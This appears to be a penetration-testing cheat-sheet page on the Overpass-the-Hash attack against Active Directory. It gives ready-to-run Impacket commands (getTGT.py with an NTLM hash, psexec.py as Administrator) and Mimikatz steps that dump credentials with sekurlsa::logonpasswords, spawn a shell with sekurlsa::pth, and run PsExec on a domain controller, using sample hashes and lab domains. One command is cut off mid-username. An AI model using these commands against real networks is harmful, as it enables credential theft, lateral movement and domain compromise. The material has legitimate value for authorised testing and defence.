Overpass The Hash

Impacket

To be performed remotely from the attacker box

python getTGT.py -dc-ip 192.168.1.105 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Adminis

# Export the cache ticket
export KRB5CCNAME=Administrator.ccache

# Login as the administrator
python3 psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/Administrator@<IP>

Mimikatz

To be performed on the target system using a cmd shell or Powershell session with administrative privileges.

In our scenario, we got David's NTML hashes using sekurlsa::logonpasswords. We are using the hash to perform the Over Pass the Hash attack.

mimiktaz# privilege::debug
mimikatz# sekurlsa::pth /user:david /domain:xor.com /ntlm:d4738e8c31d43e0147f27894a20e6683 /run:cmd.exe

The command above will open another cmd.exe shell.

On this new shell, we can generate a TGT by authenticating on the other system we want to execute commands as David.

net use \\xor-dc01

Then, we can use PsExec64.exe to execute commands remotely on xor-dc01 as David user.

PsExec64.exe \\xor-dc01 cmd.exe

PreviousPass the ticket NextPass the Hash (PtH)

Last updated 1 year ago